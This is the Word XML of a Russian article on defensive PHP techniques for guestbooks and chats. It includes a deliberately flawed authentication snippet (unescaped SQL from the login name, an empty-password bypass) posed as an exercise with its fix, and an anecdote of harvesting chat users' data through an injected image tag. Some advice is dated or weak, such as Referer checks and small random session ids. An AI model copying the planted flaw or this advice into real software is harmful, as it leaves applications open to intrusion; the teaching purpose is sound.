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1B" w:rsidRPr="00E84AC1" w:rsidRDefault="00397C1B" w:rsidP="00397C1B">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84AC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Приемы безопасного программирования веб-приложений на PHP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Данная статья не претендует на роль всеобъемлющего руководства на тему "как сделать так, чтоб меня никто не поломал". Так не бывает. Единственная цель этой статьи - показать некоторые используемые мной приемы для защиты веб- приложений типа WWW-чатов, гостевых книг, веб-форумов и других приложений подобного рода. Итак, давайте рассмотрим некоторые приемы программирования на примере некоей гостевой книги, написанной на PHP.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Первой заповедью веб-программиста, желающего написать более-менее защищенное веб-приложение, должно стать "Никогда не верь данным, присылаемым тебе пользователем". Пользователи - это по определению такие злобные хакеры, которые только и ищут момента, как бы напихать в формы ввода всякую дрянь типа PHP, JavaScript, SSI, вызовов своих жутко хакерских скриптов и тому подобных ужасных вещей. Поэтому первое, что необходимо сделать - это жесточайшим образом отфильтровать все данные, присланные пользователем.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Допустим, у нас в гостевой книге существует 3 формы ввода: имя пользователя, его e-mail и само по себе тело сообщения. Прежде всего, ограничим количество данных, передаваемых из форм ввода чем-нибудь вроде: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&lt;input type=text name=username maxlength=20&gt;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На роль настоящей защиты, конечно, это претендовать не может - единственное назначение этого элемента - ограничить пользователя от случайного ввода имени длиннее 20-ти символов. А для того, чтобы у пользователя не возникло искушения скачать документ с формами ввода и подправить параметр maxlength, установим где-нибудь в самом начале скрипта, обрабатывающего данные, проверку переменной окружения web-сервера HTTP-REFERER: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&lt;?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$referer=getenv("HTTP_REFERER");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(!ereg("^http://www.myserver.com")) {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echo "hacker? he-he...\n";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?&gt;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Теперь, если данные переданы не из форм документа, находящегося на сервере www.myserver.com, хацкеру будет выдано деморализующее сообщение. На самом деле, и это тоже не может служить 100%-ой гарантией того, что данные ДЕЙСТВИТЕЛЬНО переданы из нашего документа. В конце концов, переменная HTTP_REFERER формируется браузером, и никто не может помешать хакеру подправить код браузера, или просто зайти телнетом на 80-ый порт и сформировать свой запрос. Так что подобная защита годится только от Ну Совсем Необразованных хакеров. Впрочем, по моим наблюдениям, около 80% процентов злоумышленников на этом этапе останавливаются и дальше не лезут - то ли IQ не позволяет, то ли просто лень. Лично я попросту вынес этот фрагмент кода в отдельный файл, и вызываю его отовсюду, откуда это возможно. Времени на обращение к переменной уходит немного - а береженого Бог бережет.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Следующим этапом станет пресловутая жесткая фильтрация переданных данных. Прежде всего, не будем доверять переменной maxlength в формах ввода и ручками порежем строку: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$username=substr($username,0,20);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Не дадим пользователю использовать пустое поле имени - просто так, чтобы не давать писать анонимные сообщения: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(empty($username)) {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echo "invalid username";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Запретим пользователю использовать в своем имени любые символы, кроме букв русского и латинского алфавита, знака "_" (подчерк), пробела и цифр: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(preg_match("/[^(\w)|(\x7F-\xFF)|(\s)]/",$username)) {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echo</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>invalid</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t>";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Я предпочитаю везде, где нужно что-нибудь более сложное, чем проверить наличие паттерна в строке или поменять один паттерн на другой, использовать Перл-совместимые регулярные выражения (Perl-compatible Regular Expressions). То же самое можно делать и используя стандартные PHP-шные ereg() и eregi(). Я не буду приводить здесь эти примеры - это достаточно подробно описано в мануале.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Для поля ввода адреса e-mail добавим в список разрешенных символов знаки "@" и ".", иначе пользователь не сможет корректно ввести адрес. Зато уберем русские буквы и пробел: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if (preg_match("/[^(\w)|(\@)|(\.)]/",$usermail)) {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echo "invalid mail";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exit;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Поле ввода текста мы не будем подвергать таким жестким репрессиям - перебирать все знаки препинания, которые можно использовать, попросту лень, поэтому ограничимся использованием функций nl2br() и htmlspecialchars() - это не даст врагу понатыкать в текст сообщения html-тегов. Некоторые разработчики, наверное, скажут: "а мы все-таки очень хотим, чтобы пользователи _могли_ вставлять теги". Если сильно неймется - можно сделать некие тегозаменители, типа "текст, окруженный звездочками, будет высвечен bold'ом.". Но никогда не следует разрешать пользователям использование тегов, подразумевающих подключение внешних ресурсов - от тривиального &lt;img&gt; до супернавороченного &lt;bgsound&gt;.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Как-то раз меня попросили потестировать html-чат. Первым же замеченным мной багом было именно разрешение вставки картинок. Учитывая еще пару особенностей строения чата, через несколько минут у меня был файл, в котором аккуратно были перечислены IP-адреса, имена и пароли всех присутствовавших в этот момент на чате пользователей. Как? Да очень просто - чату был послан тег &lt;img src=http://myserver.com/myscript.pl&gt;, в результате чего браузеры всех пользователей, присутствовавших в тот момент на чате, вызвали скрипт myscript.pl с хоста myserver.com. (там не было людей, сидевших под lynx'ом :-) ). А скрипт, перед тем как выдать location на картинку, свалил мне в лог-файл половину переменных окружения - в частности QUERY_STRING, REMOTE_ADDR и других. Для каждого пользователя. С вышеупомянутым результатом.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Посему мое мнение - да, разрешить вставку html-тегов в чатах, форумах и гостевых книгах - это красиво, но игра не стоит свеч - вряд ли пользователи пойдут к Вам на книгу или в чат, зная, что их IP может стать известным первому встречному хакеру. Да и не только IP - возможности javascript'a я перечислять не буду :-)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Для примитивной гостевой книги перечисленных средств хватит, чтобы сделать ее более-менее сложной для взлома. Однако для удобства, книги обычно содержат некоторые возможности для модерирования - как минимум, возможность удаления сообщений. Разрешенную, естественно, узкому (или не очень) кругу лиц. Посмотрим, что можно сделать здесь.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Допустим, вся система модерирования книги также состоит из двух частей - страницы со списком сообщений, где можно отмечать подлежащие удалению сообщения, и непосредственно скрипта, удаляющего сообщения. Назовем их соответственно admin1.php и admin2.php.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Простейший и надежнейший способ аутентикации пользователя - размещение скриптов в директории, защищенной файлом .htaccess. Для преодоления такой защиты нужно уже не приложение ломать, а web-сервер. Что несколько сложнее и уж, во всяком случае, не укладывается в рамки темы этой статьи. Однако не всегда этот способ пригоден к употреблению - иногда бывает надо проводить авторизацию средствами самого приложения.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Первый, самый простой способ - авторизация средствами HTTP - через код 401. При виде такого кода возврата, любой нормальный браузер высветит окошко авторизации и попросит ввести логин и пароль. А в дальнейшем браузер при получении кода 401 будет пытаться подсунуть web-серверу текущие для данного realm'а логин и пароль, и только в случае неудачи потребует повторной авторизации. Пример кода для вывода требования на такую авторизацию есть во всех хрестоматиях и мануалах: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(!isset($PHP_AUTH_USER)) {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Header("WWW-Authenticate: Basic realm=\"My Realm\"");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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t>("</w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t xml:space="preserve">/1.0 401 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t>");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 xml:space="preserve">Разместим этот кусочек кода в начале скрипта admin1.php. После его выполнения, у нас будут две установленные переменные $PHP_AUTH_USER и PHP_AUTH_PW, в которых соответственно будут лежать имя и пароль, введенные пользователем. Их можно, к примеру, проверить по SQL-базе: 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*** Внимание!!!***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t>В приведенном ниже фрагменте кода сознательно допущена серьезная ошибка в безопасности. Попытайтесь</w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:t>найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:t>ее</w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:t>самостоятельно</w:t>
      </w:r>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.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$sql_statement="select password from peoples where name='$PHP_AUTH_USER'";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$result = mysql($dbname, $sql_statement);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$rpassword = mysql_result($result,0,'password');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$sql_statement = "select password('$PHP_AUTH_PW')";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$result = mysql($dbname, $sql_statement);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$password = mysql_result($result,0);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($password != $rpassword) {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Header("HTTP/1.0 401 Auth Required");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Header("WWW-authenticate: basic realm=\"My Realm\"");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Упомянутая ошибка, между прочим, очень распространена среди начинающих и невнимательных программистов. Когда-то я сам поймался на эту удочку - по счастью, особого вреда это не принесло, не считая оставленных хакером в новостной ленте нескольких нецензурных фраз.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Итак, раскрываю секрет: допустим, хакер вводит заведомо несуществующее имя пользователя и пустой пароль. При этом в результате выборки из базы переменная $rpassword принимает пустое значение. А алгоритм шифрования паролей при помощи функции СУБД MySQL Password(), так же, впрочем, как и стандартный алгоритм Unix, при попытке шифрования пустого пароля возвращает пустое значение. В итоге - $password == $rpassword, условие выполняется и взломщик получает доступ к защищенной части приложения. Лечится это либо запрещением пустых паролей, либо, на мой взгляд, более правильный путь - вставкой следующего фрагмента кода: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if (mysql_numrows($result) != 1) {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Header("HTTP/1.0 401 Auth Required");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Header("WWW-authenticate: basic realm=\"My Realm\"");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922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidRPr="000021A2">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00397C1B" w:rsidRPr="000021A2" w:rsidRDefault="00397C1B" w:rsidP="00397C1B">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000021A2">
        <w:t>}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То есть - проверкой наличия одного и только одного пользователя в базе. Ни больше, ни меньше.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Точно такую же проверку на авторизацию стоит встроить и в скрипт admin2.php. По идее, если пользователь хороший человек - то он приходит к admin2.php через admin1.php, а значит, уже является авторизованным и никаких повторных вопросов ему не будет - браузер втихомолку передаст пароль. Если же нет - ну, тогда и поругаться не грех. Скажем, вывести ту же фразу "hacker? he-he...".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К сожалению, не всегда удается воспользоваться алгоритмом авторизации через код 401 и приходится выполнять ее только средствами приложения. В общем случае модель такой авторизации будет следующей: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 xml:space="preserve">Пользователь один раз авторизуется при помощи веб-формы и скрипта, который проверяет правильность имени и пароля. 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Остальные скрипты защищенной части приложения каким-нибудь образом проверяют факт авторизованности пользователя.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Такая модель называется сессионной - после прохождения авторизации открывается так называемая "сессия", в течение которой пользователь имеет доступ к защищенной части системы. Сессия закрылась - доступ закрывается. На этом принципе, в частности, строится большинство www-чатов: пользователь может получить доступ к чату только после того, как пройдет процедуру входа. Основная сложность данной схемы заключается в том, что все скрипты защищенной части приложения каким-то образом должны знать о том, что пользователь, посылающий данные, успешно авторизовался.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Рассмотрим несколько вариантов, как это можно сделать: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После авторизации все скрипты защищенной части вызываются с неким флажком вида adminmode=1. (Не надо смеяться - я сам такое видел).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Ясно, что любой, кому известен флажок adminmode, может сам сформировать URL и зайти в режиме администрирования. Кроме того - нет возможности отличить одного пользователя от другого.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Скрипт авторизации может каким-нибудь образом передать имя пользователя другим скриптам. Распространено во многих www-чатах - для того, чтобы отличить, где чье сообщение идет, рядом с формой типа text для ввода сообщения, пристраивается форма типа hidden, где указывается имя пользователя. Тоже ненадежно, потому что хакер может скачать документ с формой к себе на диск и поменять значение формы hidden. Некоторую пользу здесь может принести вышеупомянутая проверка HTTP_REFERER - но, как я уже говорил, никаких гарантий она не дает.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Определение пользователя по IP-адресу. В этом случае, после прохождения авторизации, где-нибудь в локальной базе данных (sql, dbm, да хоть в txt- файле) сохраняется текущий IP пользователя, а все скрипты защищенной части смотрят в переменную REMOTE_ADDR и проверяют, есть ли такой адрес в базе. Если есть - значит, авторизация была, если нет - "hacker? he- he..." :-)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Это более надежный способ - не пройти авторизацию и получить доступ удастся лишь в том случае, если с того же IP сидит другой пользователь, успешно авторизовавшийся. Однако, учитывая распространенность прокси- серверов и IP-Masquerad'инга - это вполне реально.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Единственным, известным мне простым и достаточно надежным способом верификации личности пользователя является авторизация при помощи random uid. Рассмотрим ее более подробно.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После авторизации пользователя скрипт, проведший авторизацию, генерирует достаточно длинное случайное число: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mt_srand((double)microtime()*1000000);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$uid=mt_rand(1,1000000);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Это число он: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а) заносит в локальный список авторизовавшихся пользователей;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б) Выдает пользователю.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Пользователь при каждом запросе, помимо другой информации (сообщение в чате, или список сообщений в гостевой книге), отправляет серверу свой uid. При этом в документе с формами ввода будет присутствовать, наряду с другими формами, тег вида:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00397C1B" w:rsidRPr="00922974" w:rsidRDefault="00397C1B" w:rsidP="00397C1B">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922974">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;input type=hidden name=uid value=1234567890&gt;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Форма uid невидима для пользователя, но она передается скрипту защищенной части приложения. Тот сличает переданный ему uid с uid'ом, хранящимся в локальной базе и либо выполняет свою функцию, либо... "hacker? he-he...".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Единственное, что необходимо сделать при такой организации - периодически чистить локальный список uid'ов и/или сделать для пользователя кнопку "выход", при нажатии на которую локальный uid пользователя сотрется из базы на сервере - сессия закрыта.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Некоторые программисты используют в качестве uid не "одноразовое" динамически генерирующееся число, а пароль пользователя. Это допустимо, но это является "дурным тоном", поскольку пароль пользователя обычно не меняется от сессии к сессии, а значит - хакер сможет сам открывать сессии. Та же самая модель может быть использована везде, где требуется идентификация пользователя - в чатах, веб-конференциях, электронных магазинах.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В заключение стоит упомянуть и о такой полезной вещи, как ведение логов. Если в каждую из описанных процедур встроить возможность занесения события в лог- файл с указанием IP-адреса потенциального злоумышленника - то в случае реальной атаки вычислить хакера будет гораздо проще, поскольку хакеры обычно пробуют последовательно усложняющиеся атаки. Для определения IP-адреса желательно использовать не только стандартную переменную REMOTE_ADDR, но и менее известную HTTP_X_FORWARDED_FOR, которая позволяет определить IP пользователя, находящегося за прокси-сервером. Естественно - если прокси это позволяет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00397C1B" w:rsidRPr="00922974" w:rsidRDefault="00397C1B" w:rsidP="00397C1B">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00922974">
        <w:t>При ведении лог-файлов, необходимо помнить, что доступ к ним должен быть только у Вас. Лучше всего, если они будут расположены за пределами дерева каталогов, доступного через WWW. Если нет такой возможности - создайте отдельный каталог для лог-файлов и закройте туда доступ при помощи .htaccess (Deny from all).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C1B"/>
    <w:rsid w:val="000021A2"/>
    <w:rsid w:val="00397C1B"/>
    <w:rsid w:val="003F3287"/>
    <w:rsid w:val="004915ED"/>
    <w:rsid w:val="005149D7"/>
    <w:rsid w:val="00922974"/>
    <w:rsid w:val="00BB0DE0"/>
    <w:rsid w:val="00C860FA"/>
    <w:rsid w:val="00E84AC1"/>
    <w:rsid w:val="00E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341B1-8C83-48DB-B048-2872AD8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9368</Words>
  <Characters>5340</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>44</Lines>
  <Paragraphs>29</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Home</Company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Приемы безопасного программирования веб-приложений на PHP</dc:title>
  <dc:subject/>
  <dc:creator>User</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-25T18:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-25T18:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>